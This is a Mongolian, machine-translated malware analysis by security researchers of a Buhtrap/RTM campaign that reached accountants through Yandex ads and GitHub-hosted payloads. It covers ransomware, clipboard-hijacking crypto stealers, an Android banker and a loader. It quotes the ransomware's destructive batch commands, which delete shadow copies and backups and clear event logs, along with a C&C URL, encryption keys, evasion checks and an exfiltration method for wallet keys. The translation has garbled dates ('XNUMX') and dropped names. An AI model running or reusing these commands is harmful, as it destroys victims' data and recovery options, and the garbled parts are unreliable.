Нягтлан бодогчид кибер халдлагад өртөхийн тулд та тэдний онлайнаар хайдаг ажлын баримт бичгүүдийг ашиглаж болно. Энэ бол сүүлийн хэдэн сарын хугацаанд мэдэгдэж буй арын хаалгануудыг тарааж буй кибер бүлэглэлийн хийсэн зүйл юм. и , түүнчлэн криптовалют хулгайлах шифрлэгч, программ хангамж. Ихэнх зорилтот газрууд Орост байрладаг. Yandex.Direct дээр хорлонтой сурталчилгаа байршуулснаар халдлага үйлджээ. Боломжит хохирогчдыг вэбсайт руу чиглүүлж, тэднээс баримт бичгийн загвараар халхлагдсан хортой файлыг татаж авахыг хүссэн. Yandex бидний анхааруулсны дараа хортой сурталчилгааг устгасан.
Buhtrap-ийн эх код өмнө нь цахим орчинд цацагдсан тул хэн ч ашиглах боломжтой. Бидэнд RTM код байгаа эсэх талаар мэдээлэл алга.
Энэ нийтлэлд бид халдагчид Yandex.Direct ашиглан хортой програмыг хэрхэн тарааж, GitHub дээр байршуулсан талаар танд хэлэх болно. Нийтлэл нь хортой програмын техникийн шинжилгээгээр төгсөх болно.
Buhtrap болон RTM бизнест эргэн оржээ
Тархалтын механизм ба хохирогч
Хохирогчдод хүргэсэн төрөл бүрийн ачаа нь тархалтын нийтлэг механизмтай байдаг. Халдагчдын үүсгэсэн бүх хортой файлуудыг хоёр өөр GitHub репозиторуудад байрлуулсан.
Ер нь репозитор нь байнга өөрчлөгддөг, татаж авч болох нэг хортой файл агуулдаг. GitHub нь танд репозиторын өөрчлөлтийн түүхийг харах боломжийг олгодог тул бид тодорхой хугацаанд ямар хортой програм тараагдсаныг харах боломжтой. Хохирогчийг хортой файлыг татаж авахад итгүүлэхийн тулд дээрх зурагт үзүүлсэн blanki-shabloni24[.]ru вэб сайтыг ашигласан.
Сайтын дизайн болон хортой файлуудын бүх нэр нь маягт, загвар, гэрээ, дээж гэх мэт нэг ойлголтыг дагадаг. Өмнө нь Buhtrap болон RTM программ хангамжийг нягтлан бодогчид руу халдлага үйлдэхэд ашиглаж байсныг харгалзан үзвэл бид шинэ кампанит ажлын стратеги ижил байна. Цорын ганц асуулт бол хохирогч халдагчдын вэбсайт руу хэрхэн нэвтэрсэн явдал юм.
Халдвар
Энэ сайтад орсон ядаж хэд хэдэн боломжит хохирогчид хорлонтой зар сурталчилгаанд татагдсан. Доорх жишээ URL байна:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Холбоосноос харахад уг баннерыг нягтлан бодох бүртгэлийн хууль ёсны форум bb.f2[.]kz дээр байрлуулсан байна. Баннерууд өөр өөр сайтууд дээр гарч ирсэн бөгөөд бүгд ижил кампанит ажлын ID (blanki_rsya) байсан бөгөөд ихэнх нь нягтлан бодох бүртгэл эсвэл хууль зүйн туслалцааны үйлчилгээтэй холбоотой болохыг анхаарах нь чухал юм. URL-аас үзэхэд болзошгүй хохирогч "нэхэмжлэхийн маягтыг татаж авах" хүсэлтийг ашигласан бөгөөд энэ нь зорилтот халдлагын талаарх бидний таамаглалыг дэмждэг. Баннерууд гарч ирсэн сайтууд болон холбогдох хайлтын асуулга доор байна.
- нэхэмжлэхийн маягтыг татаж авах – bb.f2[.]kz
- гэрээний жишээ - Ipopen[.]ru
- Өргөдлийн гомдлын дээж - 77metrov[.]ru
- гэрээний маягт - blank-dogovor-kupli-prodazhi[.]ru
- Шүүхийн өргөдлийн жишээ - zen.yandex[.]ru
- гомдлын жишээ - yurday[.]ru
- гэрээний маягтуудын жишээ – Regforum[.]ru
- гэрээний маягт – assistentus[.]ru
- орон сууцны гэрээний жишээ – napravah[.]com
- хуулийн гэрээний дээж - avito[.]ru
blanki-shabloni24[.]ru сайт нь энгийн харааны үнэлгээ өгөхөөр тохируулагдсан байж магадгүй. Ерөнхийдөө GitHub-ийн холбоос бүхий мэргэжлийн сайт руу чиглэсэн зар сурталчилгаа нь тийм ч муу зүйл биш юм шиг санагддаг. Нэмж дурдахад халдагчид кампанит ажлын үеэр хор хөнөөлтэй файлуудыг зөвхөн хязгаарлагдмал хугацаанд хадгалах газарт байршуулсан. Ихэнх тохиолдолд GitHub репозитор нь хоосон зип архив эсвэл хоосон EXE файл агуулдаг. Тиймээс халдагчид Yandex.Direct-ээр дамжуулан тусгай хайлтын асуулгын хариуд ирсэн нягтлан бодогчдын зочилсон сайтууд дээр зар сурталчилгаа тарааж болно.
Дараа нь ийм байдлаар хуваарилагдсан янз бүрийн ачааллыг авч үзье.
Ачааллын шинжилгээ
Түгээлтийн он дараалал
Хорлонтой кампанит ажил 2018 оны XNUMX-р сарын сүүлээр эхэлсэн бөгөөд бичиж байх үед идэвхтэй байна. Хадгалах газар бүхэлдээ GitHub дээр олон нийтэд нээлттэй байсан тул бид зургаан өөр хортой програмын гэр бүлийн тархалтын цаг хугацааны нарийн хуваарийг эмхэтгэсэн (доорх зургийг үз). Гит түүхтэй харьцуулахын тулд бид ESET телеметрийн хэмжүүрээр баннер холбоосыг хэзээ илрүүлснийг харуулсан мөрийг нэмсэн. Таны харж байгаагаар энэ нь GitHub дээрх ачааллын бэлэн байдалтай сайн уялдаж байна. XNUMX-р сарын сүүлчээр гарсан зөрүү нь бидэнд өөрчлөлтийн түүхийн нэг хэсэг байхгүй байсантай холбон тайлбарлаж болно.
Зураг 1. Хортой програмын тархалтын он дараалал.
Код гарын үсэг зурах гэрчилгээ
Кампанит ажилд олон гэрчилгээ ашигласан. Заримд нь нэгээс олон хортой програмын гэр бүл гарын үсэг зурсан бөгөөд энэ нь өөр өөр дээжүүд нэг кампанит ажилд хамаарах болохыг харуулж байна. Хувийн түлхүүр байгаа хэдий ч операторууд хоёртын файлд системтэйгээр гарын үсэг зураагүй бөгөөд бүх дээжийн түлхүүрийг ашиглаагүй. 2019 оны XNUMX-р сарын сүүлээр халдагчид хувийн түлхүүргүй Google-ийн эзэмшдэг гэрчилгээг ашиглан хүчингүй гарын үсэг үүсгэж эхэлсэн.
Кампанит ажилд оролцсон бүх гэрчилгээ болон тэдний гарын үсэг зурсан хортой програмын бүлгүүдийг доорх хүснэгтэд жагсаав.
Бид мөн эдгээр код гарын үсэг зурах гэрчилгээг бусад хортой програмын гэр бүлтэй холбоо тогтооход ашигласан. Ихэнх гэрчилгээний хувьд бид GitHub репозитороор тараагдаагүй дээж олдсонгүй. Гэсэн хэдий ч TOV "MARIA" гэрчилгээг ботнетэд хамаарах хортой програмыг гарын үсэг зурахад ашигласан , adware болон уурхайчид. Энэ хортой програм нь энэ кампанит ажилтай холбоотой байх магадлал багатай юм. Хамгийн магадлалтай, гэрчилгээг darknet дээр худалдаж авсан.
Win32/Filecoder.Buhtrap
Бидний анхаарлыг татсан анхны бүрэлдэхүүн хэсэг бол шинээр нээгдсэн Win32/Filecoder.Buhtrap юм. Энэ нь заримдаа багцлагдсан Delphi хоёртын файл юм. Энэ нь ихэвчлэн 2019 оны XNUMX-XNUMX-р сард тараагдсан. Энэ нь ransomware програмд тохирсон байдлаар ажилладаг - энэ нь локал хөтчүүд болон сүлжээний хавтаснуудыг хайж, илрүүлсэн файлуудыг шифрлэдэг. Шифрлэлтийн түлхүүрийг илгээхийн тулд сервертэй холбогддоггүй тул интернетийн холболтыг эвдэх шаардлагагүй. Үүний оронд энэ нь золиослолын төгсгөлд "жетон" нэмж, операторуудтай холбогдохын тулд имэйл эсвэл Bitmessage ашиглахыг санал болгодог.
Аль болох олон мэдрэмтгий нөөцийг шифрлэхийн тулд Filecoder.Buhtrap нь шифрлэлтэд саад учруулж болох үнэ цэнэтэй мэдээллийг агуулсан нээлттэй файл боловсруулагчтай байж болох гол программ хангамжийг хаахад зориулагдсан хэлхээг ажиллуулдаг. Зорилтот процессууд нь голчлон мэдээллийн сангийн удирдлагын систем (DBMS) юм. Нэмж дурдахад Filecoder.Buhtrap нь лог файлууд болон нөөцлөлтүүдийг устгаж, өгөгдлийг сэргээхэд хэцүү болгодог. Үүнийг хийхийн тулд доорх багц скриптийг ажиллуулна уу.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap нь вэб сайтад зочилсон хүмүүсийн талаарх мэдээллийг цуглуулахад зориулагдсан хууль ёсны онлайн IP Logger үйлчилгээг ашигладаг. Энэ нь тушаалын мөрөнд хариуцдаг ransomware-ийн хохирогчдыг хянах зорилготой юм:
mshta.exe "javascript:document.write('');"
Гурван хассан жагсаалттай таарахгүй бол шифрлэлтийн файлуудыг сонгоно. Нэгдүгээрт, дараах өргөтгөлүүдтэй файлууд шифрлэгдээгүй: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys болон. .бат. Хоёрдугаарт, бүрэн зам нь доорх жагсаалтаас лавлах мөрүүдийг агуулсан бүх файлыг хассан болно.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Гуравдугаарт, зарим файлын нэрийг шифрлэлтээс хассан бөгөөд үүнд золиослолын мессежийн файлын нэр багтсан болно. Жагсаалтыг доор үзүүлэв. Мэдээжийн хэрэг, эдгээр бүх үл хамаарах зүйлүүд нь машиныг ажиллуулахад зориулагдсан боловч хамгийн бага хүчин чадалтай.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Файлын шифрлэлтийн схем
Ажиллаж дууссаны дараа хортой програм нь 512 битийн RSA түлхүүрийн хослолыг үүсгэдэг. Дараа нь хувийн экспонент (d) ба модуль (n) нь хатуу кодлогдсон 2048 битийн нийтийн түлхүүрээр (нийтийн экспонент ба модуль), zlib-ээр багцлагдсан, base64 кодчилолоор шифрлэгдсэн байна. Үүнийг хариуцах кодыг Зураг 2-т үзүүлэв.
Зураг 2. 512 битийн RSA түлхүүр хос үүсгэх үйл явцын Hex-Rays задлах үр дүн.
Зээлийн зурваст хавсаргасан тэмдэг болох үүсгэсэн хувийн түлхүүр бүхий энгийн текстийн жишээг доор харуулав.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Халдагчдын нийтийн түлхүүрийг доор өгөв.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Файлуудыг 128 битийн түлхүүрээр AES-256-CBC ашиглан шифрлэсэн. Шифрлэгдсэн файл бүрийн хувьд шинэ түлхүүр, шинэ эхлүүлэх вектор үүсдэг. Түлхүүр мэдээлэл нь шифрлэгдсэн файлын төгсгөлд нэмэгддэг. Шифрлэгдсэн файлын форматыг авч үзье.
Шифрлэгдсэн файлууд дараах толгойтой байна:
VEGA шидэт утгыг нэмсэн эх файлын өгөгдөл нь эхний 0x5000 байт хүртэл шифрлэгдсэн байна. Шифр тайлах бүх мэдээллийг дараах бүтэцтэй файлд хавсаргав.
- Файлын хэмжээ тэмдэглэгээ нь файлын хэмжээ 0x5000 байтаас том эсэхийг харуулсан тэмдэглэгээг агуулна.
— AES түлхүүр blob = ZlibCompress(RSAEncrypt(AES түлхүүр + IV, үүсгэсэн RSA түлхүүрийн хосын нийтийн түлхүүр))
- RSA түлхүүр blob = ZlibCompress(RSAEncrypt(үүсгэсэн RSA хувийн түлхүүр, хатуу кодлогдсон RSA нийтийн түлхүүр))
Win32/ClipBanker
Win32/ClipBanker нь 2018 оны 4-р сарын сүүлээс XNUMX-р сарын эхээр үе үе тараагдсан бүрэлдэхүүн хэсэг юм. Үүний үүрэг бол санах ойн агуулгыг хянах, криптовалют түрийвчний хаягийг хайж олох явдал юм. Зорилтот хэтэвчний хаягийг тодорхойлсны дараа ClipBanker үүнийг операторуудынх гэж үздэг хаягаар сольсон. Бидний шалгасан дээжүүд хайрцаглагдаагүй, бүдүүлэг биш байсан. Зан үйлдлийг далдлахад ашигладаг цорын ганц механизм бол мөр шифрлэлт юм. Операторын түрийвчний хаягийг RCXNUMX ашиглан шифрлэдэг. Зорилтот криптовалютууд нь Bitcoin, Bitcoin cash, Dogecoin, Ethereum, Ripple юм.
Халдагчдын биткойн түрийвч рүү хортой програм тархаж байх хугацаанд багахан хэсгийг VTS руу илгээсэн нь кампанит ажил амжилттай болох эсэхэд эргэлзээ төрүүлж байна. Нэмж дурдахад эдгээр гүйлгээ нь ClipBanker-тэй холбоотой байсан гэсэн нотолгоо байхгүй байна.
Win32/RTM
Win32/RTM бүрэлдэхүүн хэсэг нь 2019 оны 2017-р сарын эхээр хэд хоногийн турш тараагдсан. RTM бол алсын банкны системд чиглэсэн Delphi хэл дээр бичигдсэн Трояны банкир юм. XNUMX онд ESET судлаачид нийтэлсэн Энэ хөтөлбөрийн тайлбар нь хамааралтай хэвээр байна. 2019 оны XNUMX-р сард Palo Alto Networks мөн гаргасан .
Buhtrap ачигч
Хэсэг хугацааны турш GitHub дээр өмнөх Buhtrap хэрэгслүүдтэй төстэй биш татагч байдаг. Тэр эргэж байна https://94.100.18[.]67/RSS.php?<some_id> дараагийн шатыг авахын тулд санах ой руу шууд ачаална. Бид хоёр дахь шатны кодын хоёр зан төлөвийг ялгаж чадна. Эхний URL-д RSS.php нь Buhtrap-ийн арын хаалга руу шууд дамждаг - энэ арын хаалга нь эх кодыг задруулсаны дараа байгаатай маш төстэй юм.
Сонирхолтой нь бид Buhtrap-ийн арын хаалгатай хэд хэдэн кампанит ажлыг харж байгаа бөгөөд тэдгээрийг өөр өөр операторууд удирддаг гэж үздэг. Энэ тохиолдолд гол ялгаа нь арын хаалга нь санах ойд шууд ачаалагддаг бөгөөд бидний ярьсан DLL байршуулах үйл явцтай ердийн схемийг ашигладаггүй явдал юм. . Үүнээс гадна операторууд C&C сервер рүү сүлжээний урсгалыг шифрлэхэд ашигладаг RC4 түлхүүрийг өөрчилсөн. Бидний үзсэн ихэнх кампанит ажилд операторууд энэ түлхүүрийг өөрчлөхөд санаа зовдоггүй байв.
Хоёр дахь, илүү төвөгтэй үйлдэл нь RSS.php URL-г өөр дуудагч руу дамжуулсан явдал байв. Энэ нь динамик импортын хүснэгтийг дахин бүтээх гэх мэт зарим ойлгомжгүй байдлыг хэрэгжүүлсэн. Ачаалагчийн зорилго нь C&C сервертэй холбогдох явдал юм [.]com/api/F27F84EDA4D13B15/2, бүртгэлийг илгээж, хариу хүлээнэ үү. Энэ нь хариуг бөмбөг хэлбэрээр боловсруулж, санах ойд ачаалж, гүйцэтгэдэг. Энэ ачигчийг ажиллуулахад бидний харсан ачаалал нь ижил Buhtrap арын хаалга байсан ч өөр бүрэлдэхүүн хэсгүүд байж магадгүй.
Android/Spy.Banker
Сонирхолтой нь, Android-д зориулсан бүрэлдэхүүн хэсэг нь GitHub репозитороос олдсон байна. Тэрээр үндсэн салбартаа ганцхан өдөр буюу 1 оны арваннэгдүгээр сарын 2018-нд ажилласан. GitHub дээр нийтлэгдсэнээс гадна ESET телеметри нь энэхүү хортой програмыг тарааж байгааг нотлох баримт олоогүй байна.
Бүрэлдэхүүн хэсэг нь Android програмын багц (APK) хэлбэрээр байрладаг. Энэ нь маш их төөрөгдүүлсэн байна. Хортой үйлдэл нь APK-д байрлах шифрлэгдсэн JAR-д нуугдсан байна. Энэ түлхүүрийг ашиглан RC4-ээр шифрлэгдсэн байна:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Мөрүүдийг шифрлэхэд ижил түлхүүр болон алгоритмыг ашигладаг. JAR байрладаг APK_ROOT + image/files. Файлын эхний 4 байт нь уртын талбарын дараа шууд эхэлдэг шифрлэгдсэн JAR-ийн уртыг агуулна.
Файлын шифрийг тайлсны дараа бид өмнө нь Анубис байсныг олж мэдсэн Android-д зориулсан банкир. Хортой програм нь дараах шинж чанаруудтай.
- микрофон бичлэг
- дэлгэцийн агшин авах
- GPS координатуудыг авах
- keylogger
- төхөөрөмжийн өгөгдлийн шифрлэлт болон золиослолын эрэлт
- спам илгээх
Сонирхолтой нь, банкир өөр C&C сервер авахын тулд Twitter-ийг нөөц холбооны суваг болгон ашигласан. Бидний дүн шинжилгээ хийсэн дээж нь @JonesTrader дансыг ашигласан боловч дүн шинжилгээ хийх үед аль хэдийн хаагдсан байсан.
Банкир нь Android төхөөрөмж дээрх зорилтот програмуудын жагсаалтыг агуулдаг. Энэ нь Софосын судалгаагаар олж авсан жагсаалтаас урт юм. Жагсаалтад олон банкны программууд, Amazon, eBay зэрэг онлайн худалдааны программууд, криптовалютын үйлчилгээ зэрэг багтсан байна.
MSIL/ClipBanker.IH
Энэхүү кампанит ажлын нэг хэсэг болгон түгээсэн хамгийн сүүлийн бүрэлдэхүүн хэсэг нь 2019 оны 1.0.0-р сард гарч ирсэн .NET Windows-ын гүйцэтгэх боломжтой програм юм. Судалсан хувилбаруудын ихэнх нь ConfuserEx vXNUMX-ээр багцлагдсан. ClipBanker-ийн нэгэн адил энэ бүрэлдэхүүн хэсэг нь санах ойг ашигладаг. Түүний зорилго бол өргөн хүрээний криптовалют, түүнчлэн Steam дээр санал болгодог. Нэмж дурдахад тэрээр IP Logger үйлчилгээг ашиглан Bitcoin хувийн WIF түлхүүрийг хулгайлдаг.
Хамгаалалтын механизмууд
ConfuserEx нь дибаг хийх, дампинг хийх, өөрчлөхөөс урьдчилан сэргийлэх давуу талуудаас гадна уг бүрэлдэхүүн хэсэг нь вирусны эсрэг бүтээгдэхүүн болон виртуал машинуудыг илрүүлэх чадварыг агуулдаг.
Виртуал машин дээр ажиллаж байгаа эсэхийг шалгахын тулд хортой програм нь суулгасан Windows WMI командын мөрийг (WMIC) ашиглан BIOS-ийн мэдээллийг хүсэх болно, тухайлбал:
wmic bios
Дараа нь програм тушаалын гаралтыг задлан шинжилж, VBOX, VirtualBox, XEN, qemu, bochs, VM гэсэн түлхүүр үгсийг хайдаг.
Вирусны эсрэг бүтээгдэхүүнийг илрүүлэхийн тулд хортой программ хангамж нь Windows-ийн Аюулгүй байдлын төв рүү Windows Management Instrumentation (WMI) хүсэлтийг илгээдэг ManagementObjectSearcher API доор үзүүлсэн шиг. Base64-ээс код тайлсны дараа дуудлага дараах байдалтай байна.
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Зураг 3. Вирусны эсрэг бүтээгдэхүүнийг тодорхойлох үйл явц.
Үүнээс гадна, хортой програм нь эсэхийг шалгадаг , санах ойн халдлагаас хамгаалах хэрэгсэл бөгөөд хэрэв ажиллаж байгаа бол тухайн процессын бүх хэлхээг түдгэлзүүлж, хамгаалалтыг идэвхгүй болгодог.
Тууштай байдал
Бидний судалсан хортой програмын хувилбар нь өөрөө хуулбарладаг %APPDATA%googleupdater.exe google лавлахын "далд" шинж чанарыг тохируулна. Дараа нь тэр үнэ цэнийг өөрчилдөг SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows бүртгэлд оруулах ба замыг нэмнэ updater.exe. Ингэснээр хэрэглэгч нэвтрэх бүрт хортой програм ажиллах болно.
Хортой зан үйл
ClipBanker-ийн нэгэн адил хортой програм нь санах ойн агуулгыг хянаж, криптовалютын түрийвчний хаягийг хайж олсны дараа түүнийг операторын аль нэг хаягаар сольдог. Кодоос олдсон зүйл дээр үндэслэн зорилтот хаягуудын жагсаалтыг доор харуулав.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Хаягийн төрөл бүрийн хувьд харгалзах тогтмол илэрхийлэл байдаг. STEAM_URL утгыг Steam систем рүү довтлоход ашигладаг бөгөөд үүнийг буферт тодорхойлоход ашигладаг ердийн илэрхийллээс харж болно:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Шүүлтийн суваг
Хортой програм нь буфер дэх хаягуудыг солихоос гадна Bitcoin, Bitcoin Core болон Electrum Bitcoin түрийвчний хувийн WIF түлхүүрүүдийг онилдог. Энэхүү программ нь plogger.org-ыг WIF нууц түлхүүрийг авахын тулд гадагшлуулах суваг болгон ашигладаг. Үүнийг хийхийн тулд операторууд доор үзүүлсэн шиг User-Agent HTTP толгой хэсэгт хувийн түлхүүрийн өгөгдлийг нэмнэ.
Зураг 4. Гаралтын өгөгдөл бүхий IP Logger консол.
Операторууд iplogger.org-г түрийвчнээс гадагшлуулах зорилгоор ашиглаагүй. Талбай дээрх 255 тэмдэгтийн хязгаараас болж тэд өөр аргыг ашигласан байх User-AgentIP Logger вэб интерфэйс дээр харагдана. Бидний судалсан дээжүүдэд нөгөө гаралтын серверийг орчны хувьсагчд хадгалсан DiscordWebHook. Гайхалтай нь энэ орчны хувьсагч нь кодын аль ч хэсэгт хуваарилагдаагүй байна. Энэ нь хортой програмыг боловсруулж байгаа бөгөөд хувьсагчийг операторын туршилтын машинд хуваарилсан болохыг харуулж байна.
Хөтөлбөрийг боловсруулж байгаагийн бас нэг шинж тэмдэг бий. Хоёртын файл нь iplogger.org гэсэн хоёр URL-г агуулдаг бөгөөд өгөгдлийг гадагшлуулах үед хоёуланг нь асуудаг. Эдгээр URL-уудын аль нэгэнд хандах хүсэлтийн хувьд Referer талбар дахь утгын өмнө "DEV /" байна. Бид мөн ConfuserEx ашиглан багцлаагүй хувилбарыг олсон бөгөөд энэ URL-н хүлээн авагч нь DevFeedbackUrl нэртэй. Орчны хувьсагчийн нэр дээр үндэслэн операторууд криптовалют түрийвч хулгайлахын тулд хууль ёсны үйлчилгээ Discord болон түүний вэб таслан зогсоох системийг ашиглахаар төлөвлөж байна гэж бид үзэж байна.
дүгнэлт
Энэхүү кампанит ажил нь кибер халдлагад хууль ёсны сурталчилгааны үйлчилгээг ашигласны жишээ юм. Энэхүү схем нь Оросын байгууллагуудад чиглэж байгаа ч оросын бус үйлчилгээг ашиглан ийм халдлага үйлдэхэд бид гайхахгүй. Буултаас зайлсхийхийн тулд хэрэглэгчид татаж авсан програм хангамжийн эх сурвалжийн нэр хүндэд итгэлтэй байх ёстой.
Буулт болон MITER ATT&CK шинж чанаруудын бүрэн жагсаалтыг эндээс авах боломжтой .
Эх сурвалж: www.habr.com